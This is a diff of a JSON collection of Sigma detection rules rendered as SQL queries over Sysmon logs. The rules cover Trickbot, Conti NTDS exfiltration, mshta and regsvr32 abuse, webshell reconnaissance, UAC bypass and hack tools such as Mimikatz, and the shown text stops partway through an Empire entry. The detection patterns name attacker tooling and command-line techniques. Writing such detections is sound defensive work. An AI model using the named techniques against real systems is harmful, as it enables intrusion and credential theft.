- "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate admin usage" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "status": "test", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1560" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", - "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.execution", - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.execution", + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_webshell_detection.yml" - }, - { - "title": "HackTool - GMER Rootkit Detector and Remover Execution", - "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "status": "experimental", - "description": "Detects the execution GMER tool based on image and hash fields.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_hktl_gmer.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_regsvr32_anomalies.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", 